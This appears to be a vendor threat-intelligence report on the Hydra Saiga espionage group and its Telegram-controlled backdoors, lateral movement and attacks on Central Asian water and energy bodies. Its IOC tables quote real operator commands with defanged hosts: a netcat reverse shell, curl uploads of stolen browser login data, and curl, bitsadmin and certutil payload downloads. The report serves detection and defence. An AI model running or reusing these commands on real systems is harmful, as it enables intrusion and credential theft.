Hydra Saiga: Covert Espionage and Infiltration of Critical Utilities

Date: 2026-02-24

12 minutes read

TLP: Green 🟢

Disclaimer:

At VMRay, we believe in supporting the broader research community, as we know that collective intelligence is our best defense.
To that end, we recently collaborated with independent researcher Pol Thill on a deep-dive investigation into a series of complex campaign clusters.
Utilizing also evasion-resistant sandboxing capabilities of VMRay DeepResponse, his work has been instrumental in attributing these actions to Hydra Saiga / Yorotrooper.

IOCs & TTPs from this research have been made available within VMRay UniqueSignal Threat Intelligence Feed.

Key highlights:

Active Presence: Hydra Saiga (also known as Yorotrooper or ShadowSilk) has been active since at least 2021 and remains a significant, resilient threat as of late 2025.

Geopolitical Alignment: The group demonstrates a clear state-sponsored agenda by targeting critical water and energy infrastructure in Central Asia, directly mirroring Kazakhstan’s strategic interests.

Widespread Impact: Analysis identified at least 34 compromised organizations across 8 countries, with reconnaissance activity extending to over 200 additional targets globally.

VICTIMOLOGY

Europe:

Countries: Bulgaria, Slovakia, Netherlands, Greece, Czechia

Industries: Government, Energy, Manufacturing, Education, Legal

CIS:

Countries: Russia, Turkmenistan, Kyrgyzstan, Azerbaijan, Georgia, Mongolia, Tajikistan, Uzbekistan, Armenia, Belarus

Industries: Government, Energy, Water (unique to this region), Healthcare, Legal, Manufacturing

Middle East & Africa:

Countries: Morocco, Turkey, South Africa, Egypt, Iran, Oman

Industries: Government, Energy, Manufacturing, Aviation (Unique to this region)

South Asia:

Countries: Afghanistan, Pakistan, Indonesia, Bangladesh, Thailand, India, Singapore

Industries: Government, Energy, Healthcare, Legal, Manufacturing

South America:

Countries: Brazil, Argentina, Peru, Colombia

Industries: Energy, Legal, Healthcare, Manufacturing

Attribution Clues: Forensic patterns—specifically a UTC+5 working schedule and inactivity during Kazakhstani national holidays—strongly link the group’s operations to Kazakhstan.

Telegram as Command-and-Control: A defining characteristic of the group is the use of the Telegram Bot API for C2 communication, allowing easy setup and operation of their implants.

Evolving Toolkit: The actor employs a mix of custom implants (written in Rust, Go, and Python) and “Living off the Land” techniques, recently adapting to bypass modern defenses like Chrome’s app-bound encryption.

Critical OPSEC Failures: Operators committed significant security blunders, including infecting their own staging machines with their own implants, which exposed their browser histories, search queries, and internal infrastructure details.

HYDRA SAIGA: COVERT ESPIONAGE AND INFILTRATION OF CRITICAL UTILITIES

Hydra Saiga, also known as Yorotrooper[1], ShadowSilk[2], and Silent Lynx[3], is a suspected Kazakhstani state-sponsored threat actor, targeting government, energy and critical infrastructure in Central Asia, Europe and the Middle East. Active since at least 2021, Hydra Saiga is known for their use of the Telegram Bot API to establish C2 communication, using commodity implants such as Havoc or resocks, but also developing their own payloads written in Python, PowerShell, Golang, and Rust.

This blog post focuses on the recent post-exploitation activity of the actor as opposed to their initial access operations, which have been well covered, as well as diving into attribution, exploring the connection to the Tomiris[4] cluster, and the location of operators. The “Hydra Saiga” name for the threat cluster originated from their affinity for going after organisations linked to water resources, as well as their focus on Central Asia, with the Saiga antelope being one of the most unique animals inhabiting the Central Asian steppe.

INFECTION VECTORS

First Campaign

The first Hydra Saiga activity observed was in December 2024, when a file called “Letter from the Permanent Representative of Turkmenistan to the UN addressed to the UN Secretary General regarding the launch.exe” was uploaded to VirusTotal. This executable and its functionalities have been described in detail by Seqrite in their blog post about Silent Lynx[3]. It acts as a loader for a PowerShell backdoor using Telegram-as-a-C2 to communicate. Sandbox analysis in VMRay Platform (Figure 1) shows the key behavioral markers (VTIs) of this loader:

– Executing a PowerShell script from an executable
– Attempt to bypass PowerShell’s execution policy and skip loading profiles
– DNS request to Telegram API

Figure 1: Flagged key behaviors | VMRay Platform

The base64 blob decodes to the fully functional PowerShell backdoor (Figure 2 and 3), using the /getUpdates Telegram Bot API endpoint to receive new commands from its operators and implementing functionality to upload and download files from an operator-controlled Telegram chat.

By pivoting on the defense evasion behaviour seen in Figure 2, a host of other samples of this initial loader were revealed, dating back to August 2024, with some of them packaged in ISO or RAR files and attached to malicious phishing emails, sent from previously compromised email accounts.

Figure 2: Executed powershell command | VMRay Platform

Figure 3: Base64 decoded command

Figure 4: Network communication with Telegram API via Nonintrusive TLS visibility | VMRay Platform
(note: the bot token has already been revoked, that’s why we get 401 as return value from Telegram.)

The archive files sometimes contained decoy documents, referencing events or organisations in the region:

Figure 5: Decoy documents referencing regional organizations/events used by Hydra Saiga

Second Campaign

By pivoting on one of the IP addresses Hydra Saiga used during post-exploitation activity to host payloads, 185.106.92[.]127, a second initial infection vector was uncovered. This vector originated from a Phishing email.

Figure 6: Phishing email targeting Royal Oman Police

The email was sent from the address natalnayayevgenevna@mail[.]ru masquerading as a researcher from the Nile Research Institute and was addressed to the Royal Oman Police. The password-protected RAR attachment contained a Word document called “إنجازات الربع الثالث 2024 (003).doc“ running a malicious Macro upon opening. Submitting this again to VMRay allows us to see key behavioural clues.

Figure 7: Flagged key behaviours: creation of PowerShell process form a document, obfuscated macros and execution of macros on event “open”

Figure 8: Screenshot of the Malicious Word document

The Macro downloads a PowerShell script from the previously mentioned IP and executes it.

Figure 9: The creation of the PowerShell process from the Word and shows the command line arguments used to download the next stage payload.

Figure 10: The Macros extracted | VMRay Platform

Figure 11: Deobfuscated malicious Macro

Figure 12: Metadata from the Office document such as creation date and author

The downloaded PowerShell script is a simple obfuscated backdoor that executes attacker-provided commands on the host using Invoke-Expression and sends the result back to the same IP.

Figure 13: Deobfuscated PowerShell backdoor

Unfortunately, subsequently issued commands could not be recovered, however the IP also hosted a Meterpreter executable around the time this campaign was going on.

POST-EXPLOITATION ACTIVITY

We were able to capture the commands sent by the operators to the backdoors using Telegram-as-a-C2, which informed this research on post-exploitation behaviour. This reveals a highly manual, hands-on-keyboard operation. Operators rely heavily on sequential, non-scripted execution of standard Windows utilities (Living Off the Land or LotL) for every stage of the intrusion lifecycle, from credential harvesting (e.g., LSASS dumps) to final exfiltration (e.g., curl commands). The analysis below is structured according to the techniques observed in this manual command stream.

Figure 14: VMRay highlighting Telegram Bot API traffic

Persistence

Figure 15: Operator commands used to establish persistence

Hydra Saiga mainly established persistence through scheduled tasks and manipulating registry keys. The executables that would be executed by these mechanisms were mostly versions of the PowerShell Telegram-as-a-C2 backdoor.

Credential Access

Figure 16: Operator commands to capture user credentials

To prepare for lateral movement and privilege escalation, Hydra Saiga operators used a plethora of techniques, from simply exfiltrating a file called “passwords.txt” found on the victim’s Desktop, to using the open-source tool FakeLogonScreen[6] which displays a fake Windows logon screen to capture a victim’s password. Operators were also observed exporting SAM and SECURITY hives to try and crack password hashes as well as enabling WDigest to store credentials in plaintext and then dumping LSASS memory to try and extract them.

Lateral Movement

Figure 17: Operator commands to move laterally within a compromised network

To move laterally to a domain controller once they had access to an Administrator account, operators used nltest to discover the controller’s address and then used either Windows Management Instrumentation (WMI) or PsExec to download and execute a reverse socks5 proxy client.

Defense Evasion

Figure 18: Operator commands disabling defense measures

To ensure their payloads would remain undetected, operators would disable features of Microsoft Defender as well as trying to disable the firewall on infected devices to facilitate the connection of the reverse proxy client back to the C2 server.

Collection

Figure 19: Operator commands collecting files and screenshots

Operators took screenshots of infected machines using the PRTSC key, as well as using RAR to package documents and files into an archive ready for exfiltration.

Ingress Tool Transfer

Figure 20: Operator commands downloading additional tools

Hydra Saiga used curl, wget, bitsadmin, as well as PowerShell to download further tools on infected devices. These tools were commonly packaged in password-protected RAR archives, and ranged from reverse proxy clients like resocks[7] and tunnelling software like chisel[8] to custom browser data collectors.

Exfiltration

Figure 21: Operator commands exfiltrating RAR archive

Besides simply exfiltrating collected documents using curl to a C2 server, one of the most commonly deployed tools by Hydra Saiga was a PyInstaller executable collecting and decrypting the Chrome Login Data database.

Figure 22: PyInstaller executable decrypting and exfiltrating Chrome “Login Data” database

Hydra Saiga later iterated upon this initial tool and developed a Golang executable exfiltrating browser data for Edge, Firefox, Yandex, Opera, and Chrome, including a user’s browsing history, saved logins, and stored cookies.

Figure 23: Archive of collected CSV browser data files from Golang infostealer

As some of the operators infected their own devices, it was possible to capture the browser history from some of their staging servers which helped establish a better view of their full capabilities.

Initial Reconnaissance

Hydra Saiga used tools such as Censys and Shodan to scan for exposed servers as well as assess their targets:

Hosts Search – Censys: hxxps[:]//search.censys[.]io/search?q=labels%3D+%60email%60&resource=hosts
195.38.162[.]147 – Host Summary – Censys: hxxps[:]//search.censys[.]io/hosts/195.38.162[.]147
Shodan Account: hxxps[:]//account.shodan[.]io/login?continue=https%3A%2F%2Fwww.shodan[.]io%2Fdashboard

Once a target had been identified, operators would use the web application security scanner Acunetix to find any vulnerabilities:

Acunetix – Vulnerabilities: hxxps[:]//localhost:3443/#/scans/f806f0a0-9553-442f-841b-2aa9a983bea0/vulnerabilities?severity=3

Operators would also search for default passwords if they had identified a certain exposed server or use brute forcing to try to gain access:

pfsense default password – Google Search: hxxps[:]//www.google[.]com/search?q=pfsense+default+password
C:\Users\Administrator\Downloads\7-more-passwords.txt: hxxps[:]//github[.]com/duyet/bruteforce-database/blob/master/7-more-passwords.txt

Other initial access methods include searching for emails related to VPN configuration in compromised email accounts and downloading VPN setup tools to access target networks directly:

оиск – Почта Mail: hxxps[:]//e.mail[.]ru/search/?q_query=VPN
C:\Users\Admin\Downloads\Setting_up_Account***By_VPN_new.bat: hxxps[:]//***[.]by/index.php/apps/files/?dir=/G-SecTLS_Client/%D0%9D%D0%B0%D1%81%D1%82%D1%80%D0%BE%D0%B9%D0%BA%D0%B0%20%D0%BA%20***.by%20&fileid=7217539

Operators would also use compromised government email inboxes to send phishing emails to other government ministries or individuals in order to reach their final target:

hxxps[:]//***.uz/webmail/?_task=mail&_mbox=INBOX&_to=***%40minwater.uz&_action=compose
Kerio Connect Client: hxxps[:]//mail.***.uz/webmail/#window/mail/compose/compose$3A***$20***$20$3asr$40gov[.]uz$3E

Lastly, some operators started experimenting with the Havoc C2 framework[9] in March 2025, to supplement their tooling:

How To Install And Setup Havoc C2 Framework In Kali Linux (Bypass Windows 11 Defender) – InfoSec Pat – YouTube: hxxps[:]//www.youtube[.]com/watch?v=AD1S9-MetuM
Havoc/client/src at main · HavocFramework/Havoc · GitHub: hxxps[:]//github[.]com/HavocFramework/Havoc/tree/main/client/src

Infrastructure

As can be seen in the IOC section, Hydra Saiga operators preferred hosting providers offering anonymous payment methods, these being BitLaunch and PSB Hosting for their C2 servers and QHoster to register their domains. All of these providers allow users to pay for their services using cryptocurrency.

Furthermore, operators would also use compromised websites to host initial malicious RAR archives, often by obtaining credentials for the victims’ webhosting provider and then uploading their malicious files to the legitimate websites.

Link to Tomiris

In January 2025, the actor logged in to three servers at 82.115.223[.]210, 81.19.136[.]241, and 141.98.82[.]198 on port 9942, as well as exfiltrating data from compromised systems using curl to a server located at 88.214.26[.]37. When investigating these IPs on VirusTotal, two of them were also connected to by JLORAT samples with names such as “Фаврӣ! нх37977 теъдоди занони дар маҳбасбуда.exe” (Tajik: Urgent! nx37977 number of women in prison.exe) or “Owganystanyň gümrük edarasy bilen hyzmatdaşlygy barada.exe” (Turkmen: On cooperation with the Afghan customs service). The executables seemed to have targeted organizations in Turkmenistan, Tajikistan and Russia, mostly in March 2025.

Figure 24: VirusTotal submissions of JLORAT sample

Analysis of the executables revealed that they were JLORAT samples, a backdoor written in Rust initially described by Kaspersky in April 2023[4] and associated with an actor they were tracking as Tomiris at the time. One of the tools used by Tomiris was Telemiris, a Python backdoor that uses Telegram-as-a-C2 to communicate with its operators and functions similarly to current Hydra Saiga implants. Given the shared victimology, the near-identical tooling (Telegram C2s), and the critical observation that Hydra Saiga operators were logging directly into JLORAT C2 infrastructure (a tool exclusively tied to Tomiris), Hydra Saiga likely overlaps with the Tomiris threat cluster, and that both entities operate for Kazakhstani state interests. Kaspersky recently published a blog[5] about Tomiris and their recent activity, which matches the observations made when looking at operator activity.

Victimology

Between April 2023 and August 2025, Hydra Saiga compromised at least 34 different organizations across 8 countries, mostly operating in government, critical infrastructure, energy, healthcare, and legal sectors located in Central Asia, with the outliers being Egypt and Georgia. Furthermore, the operators conducted extensive reconnaissance, and login attempts against an additional 200 organizations worldwide in similar sectors, but located as far away as South America and South East Asia.

We sought to highlight two specific industry verticals that Hydra Saiga has consistently targeted, demonstrating how their operations align with the larger geopolitical context of the Central Asian region.

Water Campaign

Between September 2024 and March 2025, Hydra Saiga conducted an extensive campaign targeting critical water infrastructure, research institutions, and government ministries. The targeting was specifically focused on infrastructure linked to the two major regional rivers: the Syr Darya and Amu Darya.

This campaign led to compromises within:

The operator of hydroelectric power plants and the water resource service in Kyrgyzstan.
A regional administration, a research institute, and the Ministry of Water Resources in Uzbekistan.
The Ministry of Energy and Water Resources in Tajikistan.

Figure 26: Map demonstrating how Hydra Saiga’s victims relate to Central Asia’s rivers

This activity aligns strongly with Kazakhstan’s geopolitical interests. The country is heavily dependent on the Syr Darya river for its southern agricultural regions and the restoration of the North Aral Sea[10]. Furthermore, Hydra Saiga targeted two water utility companies in Russia during 2024, indicating a broad, strategic intelligence collection effort across the regional water network.

Gas and SCADA Campaign

On the 29th of April 2024, Hydra Saiga operators attempted to access several exposed SCADA endpoints and Manufacturing equipment manufacturers across multiple countries, including Argentina, Brazil, India, Netherlands, and Czechia. While these intrusion attempts appear to have been unsuccessful, the following day, operators attempted to gain access to the gas distribution system of a Russian region bordering Kazakhstan. Russia is a primary gas supplier for Kazakhstan’s northern regions, with increasing bilateral collaboration on pipeline projects[11]. It is possible Hydra Saiga operators were testing their capabilities and experimenting with SCADA endpoints in preparation for the intrusion attempt against Russia, as the targets do not align with their usual victims.

Attribution

Given that operator messages sent via the Telegram C2 are intrinsically hands-on-keyboard activity, we parsed the timestamps to forensically determine the threat actor’s working hours and likely time zone.

Figure 27: Graph showing a UTC+5 working pattern from hands-on-keyboard activity

The aggregated activity graph reveals a distinct UTC+5 working pattern, consistent across the entire campaign duration. Work begins and peaks sharply around 10:00, shows a secondary peak around 15:00, and rapidly declines after 18:00.

Splitting the activity into specific Telegram accounts reveals a similar picture:

Figure 28: Graph divided into individual Telegram user accounts

To corroborate the time zone findings, a calendar heatmap was created based on the activity of user 7677012063 in the form of a GitHub activity diagram:

Figure 29: Calendar Heatmap of operator activity from February to April 2025

Crucially, the operators were consistently active on every single working day observed in the spring of 2025, with two exceptions:

Monday, 10^th of March and Tuesday, 25^th of March.

Searching for national holidays on both days in Central Asia, Russia and China leaves only a single country that celebrates public holidays on those days, this being Kazakhstan.

10^th of March: Day off for International Women’s Day, which is celebrated on the 8^th of March

25^th of March: Day off for Nauryz Holiday, the Persian New Year

Given previous Tomiris/Yorotrooper reporting, specific targeting aligned with Kazakhstani geopolitical interests (water, gas, neighbouring governments), and hands-on-keyboard activity patterns that conclusively correlate with Kazakhstani public holidays—it is highly likely that Hydra Saiga operates for Kazakhstani state interests. It is however also possible that some operators also reside in other countries, as one operator was searching for “kazakhstan time zone” and “kazakhstan time now” on a machine set to time zone UTC + 3 (Russia), with Group-IB also identifying a Chinese speaking operator in their analysis of ShadowSilk.

Recommendations

The best way to defend against Hydra Saiga is to first block any communications with the domain “api.telegram.org”, used for the Telegram Bot API. Post-exploitation activity relies heavily on living-off-the-land tools as well as C2 connections to a common series of ASNs (check out IOCs section) that operators keep on reusing. Monitoring connections to unusual IP addresses from these providers could be useful in finding infected devices. Lastly, looking at login activity and a rise in outgoing emails on mail servers, often the final target of Hydra Saiga operators, should help identify a compromised account so defenders can quickly react.

Conclusion

Hydra Saiga is here to stay. They have shown resiliency over the years, weathering multiple operation disclosures, and have established themselves as one of the biggest threats to organizations in Central Asia and the Middle East. With resource shortages only increasing, it is likely Hydra Saiga will continue to iterate on their custom tools and experiment with new commodity malware. An example of this is that in July 2025, an operator developed a new browser login data extractor to circumvent the newly introduced Chrome app-bound encryption, as well as implants abusing Discord-as-a-C2. As Hydra Saiga continues to demonstrate an adaptable and highly persistent operational model, defenders in the region must recognize this threat as a mature, state-aligned entity requiring sustained, intelligence-driven defense.

VMRay Platform | Sandbox Analysis Reports

Powershell loader from the first campaign (name: “Letter from the Permanent Representative of Turkmenistan to the UN addressed to the UN Secretary General regarding the launch.exe”)
https://www.vmray.com/analyses/HydraSaiga-PowerShell-loaderLure document named “إنجازات الربع الثالث 2024 (003).doc“
https://www.vmray.com/analyses/HydraSaiga-lure-documentFakeLogonScreen
https://www.vmray.com/analyses/FakeLogonScreenGolang Stealer
https://www.vmray.com/analyses/HydraSaiga-GoStealerPyInstaller
https://www.vmray.com/analyses/HydraSaiga-PythonStealer

JLORAT sample
https://www.vmray.com/analyses/JLORAT

IOCs

Powershell loader from the first campaign	a44827d002d7d1a74963b80e6af8a7257977f44c89caff66f126b7d1cad1fd11
Lure document	f78dad5a95bb01f14c822addc8e4ec17b3c95b7e42f27f68f678fb43a9e56d63
FakeLogonScreen tool	e179bf035b9d9d17f8a76ecfc1ebf3b19b69f8ea05421f0d4507ded9e60c657c
Golang stealer	3da644eec41a32d72d3632b76a524d836f39f3b9854eda5d227cdf7fc4c7b543
PyInstaller stealer	8dda063860120a04bf3c7679f6a02a14aee4b5d2c3efc4dbd638dabce8a288a5
JLORAT sample	66962bb324a7c5a57ba0e9663bba156576a7e6aa5c6c1401c315b3d32f8d467d

IP Address	Provider	Usage
64[.]7[.]198[.]46	399629 – BL Networks	hxxp://64.7.198[.]46/rev.exe – Hosting resocks executable
64[.]7[.]198[.]66	399629 – BL Networks	hxxp://64.7.198[.]66/resosk443.exe – Hosting resocks executable
65[.]38[.]120[.]38	399629 – BL Networks	sokcs.exe -connect 65.38.120[.]38:443 resocks.exe 65.38.120[.]38:10443 –key mqmK3Iuyq2OI305LiUrHVSI9lVuOLlVvDn3GaGFhvJU – resocks server
65[.]38[.]121[.]107	399629 – BL Networks	hxxp://65.38.121[.]107:8000/123.txt
72[.]5[.]43[.]100	399629 – BL Networks	socks.exe -connect 72.5.43[.]100:80 rev.exe -connect 72.5.43[.]100:443 – resocks server
72[.]5[.]43[.]178	399629 – BL Networks	sokc.exe -connect 72.5.43[.]178:443 – resocks server
78[.]128[.]112[.]209	208637 – 4 Vendeta	revv2.exe -connect 78.128.112[.]209:443 – resocks server
81[.]19[.]136[.]241	9123 – JSC “TIMEWEB”	rev.exe -connect 81.19.136[.]241:443 – resocks server
82[.]115[.]223[.]210	214927 – PSB HOSTING	hxxp://82.115.223[.]210:9942/panel hxxp://82.115.223[.]210:9942/cmd_* – JLORAT C2 server
85[.]209[.]128[.]171	214927 – PSB HOSTING	hxxp://85.209.128[.]171:8080/* – open directory hosting secondary payloads 123.exe -connect 85.209.128[.]171:10443
88[.]214[.]26[.]37	35042 – Layer 7 Networks	curl.exe -X POST –limit-rate 600k hxxp://88.214.26[.]37:443/upload – exfiltration server
96[.]9[.]125[.]168	399629 – BL Networks	rev.exe -pcl 96.9.125[.]168:443 revv2.exe -connect 96.9.125[.]168:443 – resocks server
141[.]98[.]82[.]198	209588 – Flyservers	nc64.exe 141.98.82[.]198 443 -e cmd – nc C2 server curl.exe -X POST –limit-rate 600k hxxp://141.98.82[.]198:443//upload – exfiltration server
172[.]86[.]75[.]237	399629 – BL Networks	rev.exe -pcl 172.86.75[.]237:443
179[.]60[.]150[.]151	35042 – Layer 7 Networks	/cmd curl –proxy http://ig-es[:]8080 –data-binary \”@c:\\users\\***\\Login Data\” 179.60.150[.]151:443″ /cmd curl –proxy http://ig-es[:]8080 hxxp://179.60.150[.]151:443/rsocx.exe -o c:\\users\\public\\rsocx.exe” – exfiltration and secondary tools server
185[.]106[.]92[.]127	214927 – PSB HOSTING	/29605 bitsadmin /transfer myjob /download /priority high http://185.106.92[.]127/syclog.exe C:\\Users\\Public\\syclog.exe – secondary tools server

Domain	Provider	IP resolution	Usage
adm-govuz[.]com	QHoster	168[.]100[.]11[.]127	/cmd curl -o c:\\users\\public\\rev.rar hxxps://adm-govuz[.]com/rev.rar – open directory hosting secondary payloads
inboxsession[.]info	QHoster	193[.]149[.]129[.]181	/cmd curl -o c:\users\Public\Music\123.rar hxxps://admin.inboxsession[.]info/teal/ru.rar – open directory hosting secondary payloads
altaviva[.]ru	Hoster[.]by	193[.]176[.]182[.]155	/cmd certutil -urlcache -f hxxps://altaviva[.]ru/contacts/rsocx.rar c:\\users\\public\\rsocx.rar – compromised website hosting open directory
allcloudindex[.]com	QHoster	195[.]85[.]115[.]196	/cmd curl -o c:\users\public\pictures\socks.exe hxxps://auth.allcloudindex[.]com/147/sokcs.exe – open directory hosting secondary payloads
wincorpupdates[.]com	QHoster	86[.]104[.]15[.]60	/cmd bitsadmin /transfer www /download hxxps://ex.wincorpupdates[.]com/sokcs.exe c:\\users\\public\\videos\\revserv.exe – open directory hosting secondary payloads
france-deguisement[.]fr	PlanetHoster	185[.]221[.]182[.]193	bitsadmin /transfer myjob /download /priority high https://france-deguisement[.]fr/wp-content/samba.exe C:\\Users\\Public\\sokc.exe” – compromised website hosting open directory
mailkeyboard[.]com	QHoster	86[.]104[.]15[.]60	C:\Users\Admin\Downloads\medicru (2).rar,hxxps://inbox.mailkeyboard[.]com/medic/medicru.rar – open directory hosting initial stage malicious archives
mailboxarea[.]cloud	QHoster	86[.]104[.]15[.]60	/cmd curl -o c:\\users\\public\\pictures\\rserv.exe hxxps://message.mailboxarea[.]cloud/steal/ru.exe- open directory hosting secondary payloads
docworldme[.]com	QHoster	86[.]104[.]15[.]60	C:\Users\Admin\Downloads\Central_Asia-Italy_Jeenbek_Kulubaev_working-visit-to-Italy (1).rar,hxxps://mosreg.docworldme[.]com/mfa/Central_Asia-Italy_Jeenbek_Kulubaev_working-visit-to-Italy.rar – open directory hosting initial stage malicious archives
naryncity[.]kg	Hoster[.]kg	176[.]126[.]165[.]66	C:\Users\Admin\Downloads\kgnotary.rar,hxxps://naryncity[.]kg/minjust.gov.kg/kgnotary.rar – compromised website hosting open directory
pweobmxdlboi[.]com	QHoster	64[.]7[.]198[.]66	/cmd curl -o c:\\users\\\u044f\\appdata\\local\\rev.exe hxxps://pweobmxdlboi[.]com/sokcs.exe – open directory hosting secondary payloads
qwadx[.]com	QHoster	86[.]104[.]15[.]60	/go171 cmd /c curl -o C:\\users\\user\\appdata\\local\\spoolsvc.rar hxxps://ss.qwadx[.]com/spoolsvc[.]rar – open directory hosting secondary payloads

Hydra Saiga MITRE ATT&CK Mapping

Tactics	Technique Name	MITRE ID	Evidence from Report
Reconnaissance	Active Scanning	T1595	Use of Censys and Shodan to scan for exposed servers.
Reconnaissance	Search Victim-Owned Websites	T1594	Searching compromised government email inboxes for VPN configuration details.
Initial Access	Phishing: Malicious File	T1566.001	Sending malicious attachments like ISO, RAR, or Word documents via email.
Initial Access	Valid Accounts	T1078	Using credentials for webhosting providers to upload files to legitimate websites.
Execution	PowerShell	T1059.001	Execution of PowerShell backdoors and scripts for C2 and post-exploitation.
	Windows Management Instrumentation (WMI)	T1047	Using WMI to execute a reverse socks5 proxy client on domain controllers.
	Command and Scripting Interpreter: Python	T1059.006	Use of custom Python-based implants and the Telemiris backdoor.
	User Execution: Malicious File	T1204.002	Victims opening malicious email attachments or decoy documents.
Persistence	Scheduled Task/Job: Scheduled Task	T1053.005	Establishing persistence through a scheduled task named “WinUpdate”.
Persistence	Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder	T1547.001	Manipulating registry keys to ensure malware execution upon startup.
Defense Evasion	Impair Defenses: Disable or Modify Tools	T1562.001	Disabling features of Microsoft Defender and the Windows firewall.
	Obfuscated Files or Information	T1027	Use of Base64 encoding and obfuscated macros to hide malicious code.
	Living off the Land	T1218	Relying on standard Windows utilities like netsh, nltest, and bitsadmin.
Credential Access	OS Credential Dumping: LSASS Memory	T1003.001	Creating LSASS dumps to extract credentials.
	Steal Web Browser Information	T1555.003	Using custom Golang and Python tools to collect history, logins, and cookies.
	Input Capture: GUI Input Capture	T1056.002	Using the open-source tool FakeLogonScreen to capture victim passwords.
	Modify Authentication Process: WDigest Authentication	T1556.002	Enabling WDigest to store credentials in plaintext.
Discovery	Remote System Discovery	T1018	Using nltest to discover domain controller addresses.
Discovery	Network Service Discovery	T1046	Using Acunetix to find vulnerabilities in target web applications.
Lateral Movement	Remote Services: Windows Remote Management	T1021.006	Utilizing WMI to execute processes remotely within a network.
Collection	Screen Capture	T1113	Taking screenshots of infected machines using the PRTSC (Print Screen) key.
Collection	Archive Collected Data: Archive via Utility	T1560.001	Packaging stolen documents and files into RAR archives for exfiltration.
Command and Control	Application Layer Protocol: Web Protocols	T1071.001	Using the Telegram Bot API for C2 communication via HTTPS.
Command and Control	Protocol Tunneling	T1572	Using tools like chisel and resocks to establish tunnels.
Exfiltration	Exfiltration Over C2 Channel	T1041	Sending stolen data back through the Telegram-based command channel.
Exfiltration	Exfiltration Over Web Service	T1567	Using curl to POST stolen files to an external exfiltration server.